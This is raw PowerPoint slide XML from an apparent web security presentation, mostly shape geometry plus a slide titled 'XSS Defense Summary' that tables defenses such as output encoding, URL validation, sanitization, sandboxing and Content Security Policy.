                  <a:pt x="157" y="156"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2250"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="2344"/>
                  <a:pt x="157" y="2344"/>
                  <a:pt x="157" y="2344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2344"/>
                  <a:pt x="1218" y="2344"/>
                  <a:pt x="1218" y="2344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2250"/>
                  <a:pt x="1218" y="2250"/>
                  <a:pt x="1218" y="2250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2250"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2406"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2406"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="2500"/>
                  <a:pt x="157" y="2500"/>
                  <a:pt x="157" y="2500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2500"/>
                  <a:pt x="1218" y="2500"/>
                  <a:pt x="1218" y="2500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2406"/>
                  <a:pt x="1218" y="2406"/>
                  <a:pt x="1218" y="2406"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2406"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="624" y="469"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="624" y="469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="624" y="500"/>
                  <a:pt x="656" y="531"/>
                  <a:pt x="687" y="531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="718" y="531"/>
                  <a:pt x="749" y="500"/>
                  <a:pt x="749" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="749" y="438"/>
                  <a:pt x="718" y="406"/>
                  <a:pt x="687" y="406"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656" y="406"/>
                  <a:pt x="624" y="438"/>
                  <a:pt x="624" y="469"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DB3D16"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Oval 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490614" y="4540246"/>
            <a:ext cx="881430" cy="881428"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">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Freeform 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3540013" y="4589644"/>
            <a:ext cx="782632" cy="782632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 10999 w 19281"/>
              <a:gd name="T1" fmla="*/ 750 h 19281"/>
              <a:gd name="T2" fmla="*/ 10999 w 19281"/>
              <a:gd name="T3" fmla="*/ 750 h 19281"/>
              <a:gd name="T4" fmla="*/ 750 w 19281"/>
              <a:gd name="T5" fmla="*/ 8250 h 19281"/>
              <a:gd name="T6" fmla="*/ 8250 w 19281"/>
              <a:gd name="T7" fmla="*/ 18530 h 19281"/>
              <a:gd name="T8" fmla="*/ 18530 w 19281"/>
              <a:gd name="T9" fmla="*/ 10999 h 19281"/>
              <a:gd name="T10" fmla="*/ 10999 w 19281"/>
              <a:gd name="T11" fmla="*/ 750 h 19281"/>
              <a:gd name="T12" fmla="*/ 6219 w 19281"/>
              <a:gd name="T13" fmla="*/ 16655 h 19281"/>
              <a:gd name="T14" fmla="*/ 6219 w 19281"/>
              <a:gd name="T15" fmla="*/ 16655 h 19281"/>
              <a:gd name="T16" fmla="*/ 1969 w 19281"/>
              <a:gd name="T17" fmla="*/ 8437 h 19281"/>
              <a:gd name="T18" fmla="*/ 2062 w 19281"/>
              <a:gd name="T19" fmla="*/ 8031 h 19281"/>
              <a:gd name="T20" fmla="*/ 5375 w 19281"/>
              <a:gd name="T21" fmla="*/ 9905 h 19281"/>
              <a:gd name="T22" fmla="*/ 5094 w 19281"/>
              <a:gd name="T23" fmla="*/ 13093 h 19281"/>
              <a:gd name="T24" fmla="*/ 6344 w 19281"/>
              <a:gd name="T25" fmla="*/ 14968 h 19281"/>
              <a:gd name="T26" fmla="*/ 6219 w 19281"/>
              <a:gd name="T27" fmla="*/ 16655 h 19281"/>
              <a:gd name="T28" fmla="*/ 15311 w 19281"/>
              <a:gd name="T29" fmla="*/ 15186 h 19281"/>
              <a:gd name="T30" fmla="*/ 15311 w 19281"/>
              <a:gd name="T31" fmla="*/ 15186 h 19281"/>
              <a:gd name="T32" fmla="*/ 8531 w 19281"/>
              <a:gd name="T33" fmla="*/ 17405 h 19281"/>
              <a:gd name="T34" fmla="*/ 8219 w 19281"/>
              <a:gd name="T35" fmla="*/ 17343 h 19281"/>
              <a:gd name="T36" fmla="*/ 9874 w 19281"/>
              <a:gd name="T37" fmla="*/ 15499 h 19281"/>
              <a:gd name="T38" fmla="*/ 11811 w 19281"/>
              <a:gd name="T39" fmla="*/ 13843 h 19281"/>
              <a:gd name="T40" fmla="*/ 11218 w 19281"/>
              <a:gd name="T41" fmla="*/ 11780 h 19281"/>
              <a:gd name="T42" fmla="*/ 8719 w 19281"/>
              <a:gd name="T43" fmla="*/ 11061 h 19281"/>
              <a:gd name="T44" fmla="*/ 7031 w 19281"/>
              <a:gd name="T45" fmla="*/ 9375 h 19281"/>
              <a:gd name="T46" fmla="*/ 6562 w 19281"/>
              <a:gd name="T47" fmla="*/ 7000 h 19281"/>
              <a:gd name="T48" fmla="*/ 4156 w 19281"/>
              <a:gd name="T49" fmla="*/ 6562 h 19281"/>
              <a:gd name="T50" fmla="*/ 6937 w 19281"/>
              <a:gd name="T51" fmla="*/ 5250 h 19281"/>
              <a:gd name="T52" fmla="*/ 9000 w 19281"/>
              <a:gd name="T53" fmla="*/ 7344 h 19281"/>
              <a:gd name="T54" fmla="*/ 9437 w 19281"/>
              <a:gd name="T55" fmla="*/ 5344 h 19281"/>
              <a:gd name="T56" fmla="*/ 9062 w 19281"/>
              <a:gd name="T57" fmla="*/ 3781 h 19281"/>
              <a:gd name="T58" fmla="*/ 10593 w 19281"/>
              <a:gd name="T59" fmla="*/ 1812 h 19281"/>
              <a:gd name="T60" fmla="*/ 10936 w 19281"/>
              <a:gd name="T61" fmla="*/ 1844 h 19281"/>
              <a:gd name="T62" fmla="*/ 14186 w 19281"/>
              <a:gd name="T63" fmla="*/ 3156 h 19281"/>
              <a:gd name="T64" fmla="*/ 14249 w 19281"/>
              <a:gd name="T65" fmla="*/ 4531 h 19281"/>
              <a:gd name="T66" fmla="*/ 11999 w 19281"/>
              <a:gd name="T67" fmla="*/ 5469 h 19281"/>
              <a:gd name="T68" fmla="*/ 13124 w 19281"/>
              <a:gd name="T69" fmla="*/ 8687 h 19281"/>
              <a:gd name="T70" fmla="*/ 14343 w 19281"/>
              <a:gd name="T71" fmla="*/ 10499 h 19281"/>
              <a:gd name="T72" fmla="*/ 15686 w 19281"/>
              <a:gd name="T73" fmla="*/ 11468 h 19281"/>
              <a:gd name="T74" fmla="*/ 15311 w 19281"/>
              <a:gd name="T75" fmla="*/ 15186 h 19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81" h="19281">
                <a:moveTo>
                  <a:pt x="10999" y="750"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10999" y="750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6094" y="0"/>
                  <a:pt x="1500" y="3344"/>
                  <a:pt x="750" y="8250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13186"/>
                  <a:pt x="3344" y="17780"/>
                  <a:pt x="8250" y="18530"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13186" y="19280"/>
                  <a:pt x="17780" y="15905"/>
                  <a:pt x="18530" y="10999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19280" y="6094"/>
                  <a:pt x="15905" y="1500"/>
                  <a:pt x="10999" y="750"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6219" y="16655"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6219" y="16655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3250" y="15186"/>
                  <a:pt x="1437" y="11905"/>
                  <a:pt x="1969" y="8437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2000" y="8281"/>
                  <a:pt x="2031" y="8156"/>
                  <a:pt x="2062" y="8031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2594" y="9594"/>
                  <a:pt x="4281" y="8812"/>
                  <a:pt x="5375" y="9905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7000" y="11530"/>
                  <a:pt x="4844" y="11655"/>
                  <a:pt x="5094" y="13093"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5281" y="14436"/>
                  <a:pt x="6219" y="14061"/>
                  <a:pt x="6344" y="14968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5969" y="15655"/>
                  <a:pt x="6031" y="16218"/>
                  <a:pt x="6219" y="16655"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15311" y="15186"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15311" y="15186"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13593" y="16905"/>
                  <a:pt x="11124" y="17811"/>
                  <a:pt x="8531" y="17405"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8437" y="17405"/>
                  <a:pt x="8312" y="17374"/>
                  <a:pt x="8219" y="17343"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8906" y="16999"/>
                  <a:pt x="9406" y="16436"/>
                  <a:pt x="9874" y="15499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10218" y="14749"/>
                  <a:pt x="11624" y="14593"/>
                  <a:pt x="11811" y="13843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11874" y="13593"/>
                  <a:pt x="12093" y="12593"/>
                  <a:pt x="11218" y="11780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10593" y="11218"/>
                  <a:pt x="9531" y="11218"/>
                  <a:pt x="8719" y="11061"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7781" y="10874"/>
                  <a:pt x="7500" y="9500"/>
                  <a:pt x="7031" y="9375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6062" y="9125"/>
                  <a:pt x="7531" y="8250"/>
                  <a:pt x="6562" y="7000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5937" y="6187"/>
                  <a:pt x="4000" y="8156"/>
                  <a:pt x="4156" y="6562"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4281" y="5312"/>
                  <a:pt x="5719" y="4937"/>
                  <a:pt x="6937" y="5250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7625" y="5437"/>
                  <a:pt x="8406" y="7562"/>
                  <a:pt x="9000" y="7344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9718" y="7031"/>
                  <a:pt x="8562" y="5656"/>
                  <a:pt x="9437" y="5344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10030" y="5156"/>
                  <a:pt x="7969" y="5094"/>
                  <a:pt x="9062" y="3781"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10030" y="2594"/>
                  <a:pt x="10155" y="3344"/>
                  <a:pt x="10593" y="1812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10686" y="1844"/>
                  <a:pt x="10811" y="1844"/>
                  <a:pt x="10936" y="1844"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12155" y="2031"/>
                  <a:pt x="13249" y="2500"/>
                  <a:pt x="14186" y="3156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14249" y="3500"/>
                  <a:pt x="13843" y="4219"/>
                  <a:pt x="14249" y="4531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14718" y="4937"/>
                  <a:pt x="11999" y="5000"/>
                  <a:pt x="11999" y="5469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11905" y="6875"/>
                  <a:pt x="13561" y="6375"/>
                  <a:pt x="13124" y="8687"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12811" y="10311"/>
                  <a:pt x="13811" y="11186"/>
                  <a:pt x="14343" y="10499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14686" y="10030"/>
                  <a:pt x="15499" y="11093"/>
                  <a:pt x="15686" y="11468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16374" y="12936"/>
                  <a:pt x="13749" y="13561"/>
                  <a:pt x="15311" y="15186"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584528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up)">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down)">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right)">
                                      <p:cBhvr>
                                        <p:cTn id="3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6" grpId="0" animBg="1"/>
      <p:bldP spid="87" grpId="0" animBg="1"/>
      <p:bldP spid="5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53A996-F544-7F4C-A95B-5D38407DD987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F40EA7B3-B356-1543-A0A5-DD137515B3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="551144"/>
            <a:ext cx="9144000" cy="4960307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DCD62CE-4353-0C40-91C0-1F46DE488E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112735" y="5817732"/>
            <a:ext cx="2680569" cy="977030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252626103"/>
      </p:ext>
    </p:extLst>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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>111</a:t>
            </a:fld>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370832599"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4550636"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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Defense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Body/Attribute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Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification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CSS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mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</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Anywhere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Sanitization (Server and Client Side)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DOM</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Safe use of JS API's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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain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Client Parse Time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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</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Embedded</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r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3224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Mistakes were made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Content Security Policy 3.0</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41382910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
